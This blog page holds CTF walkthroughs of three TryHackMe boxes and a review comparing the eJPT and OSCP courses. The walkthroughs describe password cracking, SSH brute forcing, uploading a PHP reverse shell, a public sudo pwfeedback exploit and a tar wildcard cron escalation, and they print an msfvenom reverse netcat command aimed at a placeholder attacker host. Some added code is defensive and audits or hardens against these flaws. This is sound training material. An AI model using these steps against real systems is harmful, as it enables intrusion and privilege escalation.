Here we’re going to go through another box called Willow, created by the amazing MuirlandOracle. Knowing this is one of his creations and having done his boxes in the past, we can expect some encryption challenges and constant bumps in the road haha, let’s get into it.
L3ts G3t $h3ll
Initial nmap scans show the following ports open.
22 for SSH, 80 for HTTP, 111 for RPC bind, and 2049 for NFS (network file share).
So let’s take a look at HTTP and see what’s going on there.
For now it seems to be a huge string of random numbers, so let’s dig a little further into the other ports and see if we can find something that might give us a clue as to what this is. Let’s take a look at the NFS (Network File Share).
showmount -e <ipaddress>
Looking at the network file share, it seems someone is exporting their /var/failsafe folder to everyone (the * in the showmount output). So let’s mount this and take a look.
Looks to be something to do with RSA key pairs, so maybe that gives us a clue to what’s on the web page.
Also note “Recovery Page” in the title here.
Let’s see if we can work out what this is and decrypt it.
Putting this through CyberChef and using the SSH parser module, we manage to decrypt this message and see a note about it being an SSH private key.
"Key type: Willow, here's your SSH Private key -- you know where the decryption key is!"
So I imagine where they’re saying “you know where the decryption key is”, it is the things we found on the NFS share that will help us. Let’s now use an RSA calculator to work out and decrypt the encrypted message.
It should also be noted that MuirlandOracle has written a great explanation of RSA key generation, and at the bottom, in the example scripts, we can see that the E, N and D values are printed out. We have these values from the NFS share.
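The decryption step itself, as an added example (not the box’s RSA calculator and not MuirlandOracle’s scripts): it assumes the recovery page is a whitespace-separated list of decimal ciphertext blocks and that N and D come from the NFS share; the primes below are constructed for the demo and far smaller than real ones.

```python
# Added example: unpadded ("textbook") RSA decryption of a page full of numbers.
# n, e, d are derived from constructed demo primes; on the box they come from
# the NFS share and are far larger.
from math import gcd

DEMO_P, DEMO_Q = 104729, 1299709        # constructed small primes for the demo


def textbook_rsa_keypair(p, q, e=65537):
    """Derive (n, e, d) the way the referenced RSA explainer's scripts do."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                  # modular inverse (Python 3.8+)
    return n, e, d


def check_private_exponent(e, d, p, q):
    """Sanity check on recovered key material: e*d == 1 (mod phi(n))."""
    return (e * d) % ((p - 1) * (q - 1)) == 1


def block_len(n):
    """Largest whole-byte block that is always < n (textbook RSA needs m < n)."""
    return (n.bit_length() - 1) // 8


def encrypt_blocks(message, n, e):
    """Split message into blocks and encrypt each one: c = m^e mod n."""
    size = block_len(n)
    chunks = [message[i:i + size] for i in range(0, len(message), size)]
    return [pow(int.from_bytes(chunk, "big"), e, n) for chunk in chunks]


def parse_recovery_page(text):
    """The 'huge string of random numbers': whitespace-separated decimal blocks."""
    return [int(tok) for tok in text.split()]


def decrypt_blocks(numbers, n, d):
    """Reverse: m = c^d mod n, then back to bytes. Unpadded RSA cannot preserve
    leading 0x00 bytes of a block, which is fine for the ASCII note here."""
    out = bytearray()
    for c in numbers:
        m = pow(c, d, n)
        out += m.to_bytes((m.bit_length() + 7) // 8, "big")
    return bytes(out)


def demo_roundtrip(note=b"Willow, here's your SSH Private key"):
    """Constructed end-to-end run: build a key, make a 'page', decrypt it."""
    n, e, d = textbook_rsa_keypair(DEMO_P, DEMO_Q)
    page = " ".join(str(c) for c in encrypt_blocks(note, n, e))
    return decrypt_blocks(parse_recovery_page(page), n, d)
```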
Retrieved Private SSH Key
Great, let’s see if we can save this and use it now!
Of course it’s never that fucking easy! However, we can use our good old friend JohnTheRipper to convert this key into a hash and see if we can crack it!
Cracking time, again with john and using the rockyou wordlist.
Great, we have the password, so now let’s try to SSH to the box again and see if we get in!
WE’RE IN!
Let’s grab that user flag now that we have our SSH shell on the box as the willow user.
RIGHT! Of course there’s always that extra step. Right, let’s base64 this picture, transfer the output to my box and decode it.
cat user.jpg | base64
Now take all the output from the above command and put it inside a file; I put it inside one I created called “user.b64”, then cat’d and decoded that file and wrote the output to user.jpg.
cat user.b64 | base64 -d > user.jpg
We got user flag
Awesome, we have our user flag!
L3t5 G3t r00t
Okay, let’s take a look around and see what we’ve got to work with to get root.
Above we did the same procedure as before, but this time to get the LinEnum script over to the box. Let’s run the LinEnum script now and sieve through the results.
Hmm, okay, let’s make a note that we can run the /bin/mount command as root with no password; this might give us a hint as to where we need to look.
If we look in /dev, this is normally where devices and filesystems show up; we would then need to mount one somewhere in our directory tree.
a secret path
So with that, and knowing we can run the mount command with sudo, let’s try and mount this partition onto /mnt/creds.
Now let’s take a look inside the partition and see if we find anything useful.
OH YEAH CREDS!!!!
Amazing, we have the root and willow users’ passwords. Let’s switch user to root and get that root flag.
Again, another roadblock! Well, let’s now try and work this out. We have the root password and the willow password, but what does “I gave you the root flag some time ago” mean? hmmm…
OF COURSE!!!!
That little sneaky bastard, I bet he has hidden something in user.jpg! Okay, let’s see if we can extract it using steghide.
sneaky sneaky sneaky! root flag!
ROOOOOOOOT!!
Thanks again MuirlandOracle for another interesting, and infuriating, box haha. Hope you all learnt something from this box 🙂
This is my walkthrough on how I did the CherryBlossom box on tryhackme.com. It was an amazing box and fair play to the creator for this one, a very smart guy known only as MuirlandOracle.
This box consists of multiple layers of steganography which eventually lead you to a journal/diary, in which you find information that leads you to a shell on the box, then lateral movement to another user and finally rooting the box. It was painstaking work and not for the fainthearted 🙂 enjoy the read.
Warning: most filenames have been either changed in the screenshots or blurred to encourage you to go find these things yourself 😉
L3t’s G3t A $h3ll
First things first, we need to do an nmap scan of the box.
Nmap shows us that we have ports 22 (SSH), 139 and 445 (Samba) open, so let’s start enumerating the Samba services using enum4linux.
enum4linux -a <ipaddress>
Cool, we found an open share. Now let’s flick over to another tool for further enumeration of SMB called smbmap; this will try to list shares and their contents if readable.
smbmap -H <ipaddress>
Great, within that share we found a .txt file, so let’s use smbmap to download it.
Okay, so let’s take a look into this file and see what it is and whether we have anything juicy within.
By the looks of it, it just seems to be base64, so let’s decode it and see what we get from it.
cat <file> | base64 -d > decoded.b64
Now we have something that looks like a PNG file, so let’s take a look.
hmmm, just a picture of cherry blossom, so let’s do a little more digging into the picture and see what’s going on. For this I’m going to start using a toolkit called stego-toolkit, and it can be found here.
Not going to give a full walkthrough on how this tool works, as there are quite a few online, but you can run either check_png.sh <filename> or check_jpg.sh <filename> and it will run a series of checks against your file. Here I used check_png.sh decoded.b64.
The thing that raised my suspicions about this picture having something to hide was that the file was 2.5MB in size and another tool called zsteg kept finding “Secret” stuff within. Don’t believe everything you see from one tool; make sure to use 2 or 3 different ones.
zsteg output
Let’s try and use another tool within this toolkit to extract anything from the picture; here we use stegpy <filename>.
Great, so we have extracted a zip file, so let’s take a look at this now (the name of the file was changed).
Hmm, that’s odd, this zip is telling us it’s another picture. Let’s try and unzip it.
This time we get an error about the file’s header signature, so let’s take a closer look at the hex and see what’s going on. For this I used an awesome online tool called HexEd.it – great little tool.
Okay, we have a .ctz (CherryTree file) within a zip file that is using JPEG magic byte numbers. This sounds confusing, and it is, but basically magic byte numbers, OR file signatures, are a unique set of bytes that identifies what type of file something is. For a list of signature numbers go here – File Signatures.
JPEG’s signature is “FF D8 FF D8”
Let’s change these JPEG signatures to be that of a ZIP file; I’ll let you hunt out the signature for that 😉.
It should look like a ZIP now.
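A check for exactly this kind of mismatch, added here as an example (not code from the original walkthrough): it identifies a file by its leading bytes, confirms from the archive’s own structure that the body really is a ZIP, and puts the ZIP signature back, all on a constructed in-memory sample.

```python
# Added example: file-signature (magic byte) mismatch detection and repair.
# The sample archive is constructed in memory; the signatures are public values.
import io
import zipfile

SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",            # 4th byte varies (E0, E1, DB, ...)
    b"PK\x03\x04": "zip",               # 50 4B 03 04, ZIP local file header
    b"7z\xbc\xaf\x27\x1c": "7z",        # CherryTree .ctz files are 7-Zip archives
}


def identify(data):
    """Type claimed by the leading bytes, or 'unknown'."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def looks_like_zip_body(data):
    """Structural evidence independent of the first bytes: every ZIP ends with an
    End Of Central Directory record (PK 05 06) within the last 22+65535 bytes."""
    return len(data) > 30 and b"PK\x05\x06" in data[-65557:]


def repair_zip_header(data):
    """Restore the local-file-header signature that the hex-edit step fixed by hand."""
    if identify(data) == "zip":
        return data
    if not looks_like_zip_body(data):
        raise ValueError("body does not look like a ZIP archive")
    return b"PK\x03\x04" + data[4:]


def read_member(data, name):
    """Read one member; zipfile checks the local header magic at this point."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def member_readable(data, name):
    """True if the member extracts cleanly, False on a bad header signature."""
    try:
        read_member(data, name)
        return True
    except zipfile.BadZipFile:
        return False


def disguised_zip_sample():
    """Constructed sample: a real ZIP holding diary.ctz whose first four bytes
    were overwritten with a JPEG-looking header (FF D8 FF E0)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("diary.ctz", b"not really a cherrytree file")
    return b"\xff\xd8\xff\xe0" + buf.getvalue()[4:]
```

Listing the archive would still succeed on the disguised file, because the central directory at the end is intact; it is only extracting a member that trips over the overwritten local header.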
Now let’s export this and try and unzip it again and see if it works.
Okay great, we get asked for a password to extract this new mystery .ctz file.
Let’s use another tool in stego-toolkit called fcrackzip, which is a password attacker for ZIP files, and see if we can get a password for our zipped file.
Amazing, we have a password, so now let’s unzip this password-protected file and see what comes out.
Great, we have ourselves a .ctz file, which is a CherryTree file that has been zipped and password protected (I renamed the file to diary.ctz).
So with it being a 7-zip file we can use JTR (JohnTheRipper) to convert this for us into a hash for a bit of a hash cracking session 😀 like we haven’t done enough at this stage!
That’s a little small to see, but I’m running 7z2john against our diary.ctz and it’s throwing us an error saying we’re missing a module. Let’s see if we can find this module and install it. *Skipping 15 mins of searching here for the module*.
Okay great, so running that again with our new module installed, we get a great big dirty SHA256 hash that we will store in a file called “hash”, original I know. Time to crack the hash; we are going to use john for this and the rockyou.txt wordlist.
Password retrieved, let’s see if we can now open this password-protected CherryTree file using CherryTree.
Cool, so we have a diary with a few entries. I won’t spoil anything here for anyone, but I’ll let you read through it. In one of the entries we find the journal flag.
FIRST FLAG!
The important part here is that we get a few potential usernames, including the person’s girlfriend. He later talks in his diary about how he’s got a list of unique passwords he created, and how he has chosen one and his girlfriend has chosen one, so that’s 2 passwords from the list that are now in use. The password lists were in the diary as well as in an attached file. I won’t tell you which one I used.
With that information, let’s see if we can hydra our way into his girlfriend’s account, as we see her username, while we don’t know the other person’s name yet as they refer to themselves by their initial. We see this by looking at the diary entries.
Hydra is a great tool for bruteforcing a range of logins and more! Here we are using it with the girlfriend as the username, a password list, -V for verbosity to see every login attempt, -f to stop the attack upon the first successful login, and -e ns to also try a blank password and the username as the password.
SUCCESS!!!
Let’s try and SSH in and see what we get.
Great, we have our initial shell on the target machine 😀 BUT not user, as no user flag yet 😦 more digging…
L4ter4l M0v3MenT
Now our next step is going to be a lateral move across to the boyfriend, who is the owner of the diary and a user on the box.
Let’s upload our favourite tool LinPEAS using another tool I have grown to love, which has replaced the good old “python SimpleHTTPServer” module, called updog. Kick that off and see what we find. updog is amazing! I highly suggest going and checking it out!
With that running we can now do a wget of our linpeas script from the SSH shell we have.
getting linpeas, easy as that.
After some very deep looking we find an interesting file in our linpeas results.
Let’s go take a look at that and see what we find.
Great, we found some hashes, including the boyfriend’s hash. Let’s see if we can crack one of them, as we already have the password to the other one, the girlfriend’s account.
Using hashcat we can start cracking our hash using the following:
-m specifies the hash type we are cracking; -o is the output file name to put the password in if cracked; -O is to optimize the cracking.
If you find it taking a while to crack, try to remember something from the diary.
Eventually the password cracks, and now we can try logging in via SSH as this user.
That failed; maybe it’s because SSH login is not permitted for this user, so let’s go back to the girlfriend’s shell and try switching user.
su <username>
A simple “su <username>” seemed to work just fine, and we get the user flag.
L3t’s G3t R00t
Okay, now let’s copy the LinPEAS script over to this user, run it as him and see if he has anything cool to find.
After some more digging we find we should try “sudo -l” and see what we can run as the root user. This is one of the first things you should try when you get access; it’s always nice to find easy wins.
That’s strange, we shouldn’t be getting the password echoed back to us. This is a function called pwfeedback that’s enabled in the /etc/sudoers config; more about it here: CVE-2019-18634. Basically a stack buffer overflow in this version.
Git clone the exploit down, and then compile the code with gcc by running the following:
gcc exploit.c -o exploit
Now upload this exploit to the box with updog and run it.
!!!ROOT!!!
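A defender’s check for the setting behind this, added as an example (not part of the original write-up): it parses the Defaults lines of a sudoers file, honouring scoped Defaults, comma-separated options, negation and line continuation, and reports where pwfeedback is still enabled. The sudoers content below is a constructed sample.

```python
# Added example: find where a sudoers file leaves pwfeedback enabled, the
# option that made this box's sudo exploitable (CVE-2019-18634).
# The configuration below is a constructed sample; on a real host you would feed
# in /etc/sudoers and the files under /etc/sudoers.d (readable by root).
import re

SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
Defaults        mail_badpass, pwfeedback
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"
Defaults:alice  !pwfeedback
Defaults@host1  pwfeedback, \\
                timestamp_timeout=5
root    ALL=(ALL:ALL) ALL
"""

# Defaults, Defaults:user, Defaults@host, Defaults>runas, Defaults!command
_DEFAULTS_RE = re.compile(r"^Defaults([:@>!]\S+)?\s+(.*)$")


def _logical_lines(text):
    """Join backslash-continued lines and drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        line = (buf + line).strip()
        buf = ""
        if line and not line.startswith("#"):
            yield line


def pwfeedback_state(text):
    """Map each Defaults scope ('' = global, ':alice', '@host1', ...) to the
    final pwfeedback value set in that scope; the last assignment wins."""
    state = {}
    for line in _logical_lines(text):
        match = _DEFAULTS_RE.match(line)
        if not match:
            continue
        scope = match.group(1) or ""
        for opt in (o.strip() for o in match.group(2).split(",")):
            if opt == "pwfeedback":
                state[scope] = True
            elif opt == "!pwfeedback":
                state[scope] = False
    return state


def findings(text):
    """Scopes where pwfeedback ends up enabled; the fix is 'Defaults !pwfeedback'."""
    return sorted(scope for scope, on in pwfeedback_state(text).items() if on)
```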
Hope you enjoyed it as much as I did. Very frustrating, but fun and rewarding, and I learnt loads! Thanks again MuirlandOracle for the box, it was truly a great experience!
This is going to be a simple walkthrough on how I did the CMESS box on TryHackMe.com. The privilege escalation demonstrates a really good use of wildcard exploitation. The creator of the box is Optional, and thank you to him for creating an awesome fun box.
Let’s g3t 4 Sh3ll
First things first, we’re told to add the hostname to our /etc/hosts file.
So kicking off the box with an nmap scan, we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories we should always enumerate for any subdomains; for that I used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry into the hosts file as well, so we can browse to it.
Upon going to our newly found subdomain we see a conversation between the user, andre, and support. These are both email addresses or possible usernames we could use in the future, so make a note of these.
We also see that the support user has reset andre’s password, so let’s take that and see if we can use it anywhere. Looking back at our gobuster output we can see we have an /admin directory. Let’s take a look.
We find a login page that takes an email and a password; we have these, so let’s try them.
And we get logged in. Straight away we see a “Gila CMS version”, so let’s take a look if there are any exploits for it.
Searchsploit shows that there is an LFI, or Local File Inclusion, for this version, so let’s take a look using
searchsploit -x <exploit-path>
Let’s see if we can use the last bit of this URL in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay great! We see we have some type of directory listing now with some upload functionality, so let’s see if we can upload a shell.
We manage to upload a payload which goes into the “assets” directory. Let’s start a listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to process the payload.
Awesome, we have a shell as www-data. Looking around we see we can’t get into the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Let’s head over to the /tmp directory and grab linenum.sh, and see what we can do as the www-data user and maybe find anything interesting.
Grab the linenum.sh file: “python3 -m http.server” serves the request for “le.sh” (linenum.sh).
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing; we then see in the results some interesting files lurking about.
This looks interesting, so let’s take a look.
Awesome, we found a password!! Let’s see if we can now SSH to the box as andre 😀
Awesome, let’s grab user.txt while we’re here 🙂
L3ts g3t R00T!
Nice, we got user!! Let’s repeat the LinEnum process and see if we can do anything else new. However, this time I’m going to use an “upgraded” version of LinEnum called LinPEAS. This does the same thing as LinEnum and some more…
LinPEAS has a wicked awesome colour scheme for quickly hunting out privilege escalation points! So let’s begin the hunt.
Looking into our results from LinPEAS we see that it’s flagged a cronjob that runs as root every 2 mins.
This job is running a tar command to back up the andre user’s “backup” directory and everything in it.
We need to create 2 directories and a shell.sh file inside the /home/andre/backup directory that tar will see, interpret as command-line options and execute. SUCKAA!
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload
Head over to the directory that’s going to be backed up by tar; we see a little note.
Let’s now echo our payload into “shell.sh” and create the 2 directories needed for this exploit.
Now we wait for the cron job to run, and we should get tar to interpret those entries and execute our shell.sh file.
Run “date” to see the system’s time.
Woop Woop we got our shell back from the box!
This was a great box and really demonstrated the issues behind using wildcards in automated jobs or scripts, and how a hacker can leverage these vulnerabilities to gain higher privileges.
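From the defender’s side, here is an added example (not from the original write-up, and deliberately not the attacker’s file names): the weak cron command beside a hardened form, an audit for entries a wildcard would hand to tar as options, and a backup routine that never parses entry names at all. The directory layout is constructed in a temp dir.

```python
# Added example: auditing and hardening a root cron backup that globs a
# user-writable directory. Paths and files here are constructed for the demo.
import os
import tarfile
import tempfile

# Weak pattern from the box: the shell expands '*' inside the backup directory,
# so an entry whose name begins with '-' reaches tar as an option, not a path.
WEAK_CRON_COMMAND = "cd /home/andre/backup && tar -zcf /tmp/backup.tar.gz *"

# Hardened: no glob at all. tar gets the directory via -C and a single operand
# '.', and '--' ends option parsing, so entry names are never read as options.
HARDENED_CRON_COMMAND = "tar -zcf /tmp/backup.tar.gz -C /home/andre/backup -- ."


def option_like_entries(directory):
    """Entries a wildcard would turn into tar options: names starting with '-'."""
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def hardened_backup(directory, archive):
    """Archive the directory tree without shelling out: tarfile walks the tree
    itself, so a '-something' entry is stored as data like any other file.
    Returns the archive's member names for inspection."""
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(directory, arcname=".")
    with tarfile.open(archive, "r:gz") as tar:
        return sorted(tar.getnames())


def demo():
    """Constructed scenario: a backup dir with a normal note and a dash-named entry."""
    root = tempfile.mkdtemp()
    backup = os.path.join(root, "backup")
    os.mkdir(backup)
    with open(os.path.join(backup, "note.txt"), "w") as fh:
        fh.write("back me up\n")
    with open(os.path.join(backup, "-not-an-option.txt"), "w") as fh:
        fh.write("a file name, not a tar flag\n")
    return {
        "suspicious": option_like_entries(backup),
        "members": hardened_backup(backup, os.path.join(root, "backup.tar.gz")),
    }
```

The audit is worth running against any directory a privileged job globs, not just this one; a dash-prefixed name in a user-writable path is a finding regardless of what it contains.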
I have seen a lot of conversation about the difference between these two providers of penetration testing courses or hacking courses. So below I’m going to give you my rundown of the 2. Also I’m stating now that I ain’t the best at spelling and grammar, so don’t be a fuck-tard and start correcting my shit, just read and get on with it!
Now I just want to let you know I have my OSCP certificate and my eJPT (Junior Penetration Tester) certificate, and have bought but not completed the ELearnSecurity PTP course. So from here on I speak about my opinions, which are my own, and my experience with both of these.
So if you’re new to the Cyber Security world and you wanna become a fu*king hacker baby! then you would definitely have googled “how to become a hacker”, “how do I start in penetration testing” or “does my cat secretly watch me while I sleep”. Okay, maybe not that last one, but yeah, the other two. I know I did when I first started, and right now you’ll get lots of different results, and that’s how you might have even ended up here. Eventually you’ll work out that you need to get OSCP and maybe some other certificates or qualifications, but you tend to always read “OSCP is a must to get a job in Cyber Security”. Then you realize that OSCP is a bit f*cking mental and probably for the 1337 wannabe hackers, so you start looking around for courses in penetration testing and hacking and you’ll find this company called ELearnSecurity, which delivers complete beginner courses in penetration testing. So let’s go into that and talk about the differences between ELearnSecurity’s PTS (Penetration Testing Student) course and OSCP.
ELearnSecurity
So ELearnSecurity is first of all amazing, it really is. Head over to their website and check out the courses they provide. When I did this exactly 2 years ago today I found myself really interested in the PTS course (Penetration Testing Student) which was their course for people with NO EXPERIENCE AT ALL!!! So I bought it, and got started!
Looking at the syllabus I felt pretty confident I could jump in to this and invest a few hours a day learning their powerpoint style material and the videos at the end of each section drilling in everything you learnt in utter detail!
PTS Syllabus
The course takes you through a very structured way of learning. It teaches you all the basics you need to know, like NMAP scans and the different flags to use, what XSS scripts and SQL injections are and how they work, how to exploit SMB, and many more. Each section generally teaches you a subject and then finishes it with a video or 2 about it, where the instructor shows you step by step what you just learned in the slides; this method of teaching is really good and really drove home certain points you need to remember. Then once you have learnt that section, let’s say on NMAP, it gets you to start the “NMAP Lab”, where you will open the challenges for that lab and it will ask you something like “What ports are open on the 3 computers in the network”, and then you put to the test everything you learned from that NMAP section. Below is a list of labs from PTSv3! I think they’re on V5 now, but as far as I’m aware not too much has changed, just some more stuff added; when you buy the course you will get the latest and greatest version.
PTSv3 Labs
Their sh*t is structured, nice and just damn right sexy. It will take you from an absolute n00bian and give you those foundations you will need to start enumerating shit and hacking things. It gives you enough experience that once completed you can start jumping on the active boxes in HTB or smash your way through the labs/VMs in Vulnhub.
EXAM TIME. Once you have finished all the course material and the videos, and then completed all the labs (do them twice over), you will have to do your exam, the eJPT exam, to test your new powers! Now the exam is good fun; here you will be presented with a domain network style pentest and have to hack your way through like 10 computers and 3 servers to answer questions that get given to you at the beginning. If I remember rightly there are about 20 questions ranging over things you will find in this domain network testy environment exam thingy, and you have 3 days to complete this exam! Now honestly it took me around 8 hours to do the whole thing, and I was a NOOB! That’s not to say it’s easy though!…
Once completed, and you submit your answers and you feel you have done and got everything you need, you will hit that big fuc*ing submit button and wait; after a while the page will load up and it will tell you if you have passed or failed. Honestly it’s a beginner course and it will deffo teach you everything you need to know in order to pass and get your feet wet in the real world!
ELearnSecurity Recap:
Online course available 24/7.
Powerpoint type presentations.
Multiple Videos for each sections.
Individual labs for end of every section.
3 Day Question based exam on domain network (more than enough time).
OSCP
Right, where do I start with OSCP? There are a lot of reviews and blogs out there for this one, so I will go over my findings of the course. OSCP is Offensive Security Certified Professional; it’s considered the 31337 course and exam to prove to oneself that you’re a hacker/penetration tester. In order to become OSCP certified you will need to do their PWK course and pass the exam; details on that are here.
So I started my OSCP journey back in August 2018 and passed in February 2019. I’m not going to bore you with the details, as the actual journey and write-up can be found here. I will however tell you how it’s structured!
When you buy OSCP you will start it on the 2nd Sunday from the day you bought the course, I’m sure that’s how it works. On day one you will get an email with all the course material and connection packages (VPN files) to get started.
Now when you have downloaded all this you will have a folder called “oscp-pwk” or something along those lines, and inside there is your ~350 page PDF manual and all the training videos. You open up the video training and it will look like the below.
OSCP Videos
You will be shown everything from netcat listeners to reverse shells, from exploiting SQL injections to privilege escalation and gaining root. Once you’ve gone through all the PDF and videos that they provide, which took me about a week, you will then VPN to the labs. Once in, you’re faced with a big domain network and left to do what you want; you’re free to go explore and hack your way through their network as long as you follow a couple of rules and respect others that might be using or have used a box. I advise giving a box a reset before you jump on it! Below is a map of their network; you will start in the “Student Labs, Public Network” and hack your way through and pivot your way to other networks, with the goal being the admin department!
Now Offensive Security, throughout their training, will give you JUST enough information to get you started on boxes and then leave you to find the answers for yourself! For example they will show you what things to look for when hacking a web app on a server, but it will be up to you to find out how to hack the stuff on the website, like the E-commerce shop on there, or how to hack the actual web server the web app sits on.
With OSCP you will find yourself in Google a lot searching up exploits for certain versions of things or finding out how to privilege escalate a Windows/Linux computer. You will also find yourself in Exploit-DB a lot, which is basically, in short, a library of exploits for all sorts of things! And sometimes you will have to make changes to those exploits!
The exam is basically 5 computers separate from each other, and all have their own unique ways of being pwned; you have to pwn each one and get a shell, and then root/admin it to get full points for it. Each of the 5 boxes is point based and you have to get 70 POINTS OUT OF 100 WITHIN 24 HOURS TO WIN! Below is a quick look at what boxes are worth, points wise.
25 point box ( Buffer Over Flow )
25 point box
20 point box
20 point box
10 point box
Therefore it’s up to you how you tackle this and get your points! BUT that’s not the end! Once you’ve got all your points you will then need to WRITE A REPORT WITHIN 24HRS! And this is all back to back, so from the moment you start your exam you have basically 48 hours to hack sh*t up and get a report back to Offensive Security, which then takes a couple of days to get your results! You best make sure your report is shit hot, cause they can and will fail you for spelling or grammar mistakes!!! Sh*t, they will fail you for sending them the report unencrypted, but don’t worry, you will be told how to do this when the time comes!
OSCP Recap:
~350 page PDF Manual.
Offline Video led training.
24/7 access to domain network lab.
Offensive Security show only enough to get you started.
A lot you learn as you go through labs and research.
24hr Practical Exam.
24hr Report Writing.
Conclusion
If you’re starting your journey into Cyber Security and you wanna become a f*cking awesome hacker and you don’t know where to start, then head over to ELearnSecurity and do their PTS (Penetration Testing Student) course, then once completed jump on OSCP. Skip their PTP (Penetration Testing Professional) course as you won’t need it to pass OSCP! OSCP will teach you enough to pass their exam if you go into it knowing the foundations of hacking.
If you’re already hacking things and know your way around enumeration a bit and can comfortably exploit things and get shellz, then skip ELearn’s PTS and jump straight on to OSCP and start bashing away at that. OSCP will take you from foundation knowledge to advanced and get you hacking away even better than you were.
Remember that OSCP is also a beginner course; this is something a lot of people forget. They do provide some mega good training, but after that you’re left to do your own research and exploitation.
Any questions let me know… Hope you enjoyed!
And for those out there now doing your OSCP or eJPT exam, I say this to you!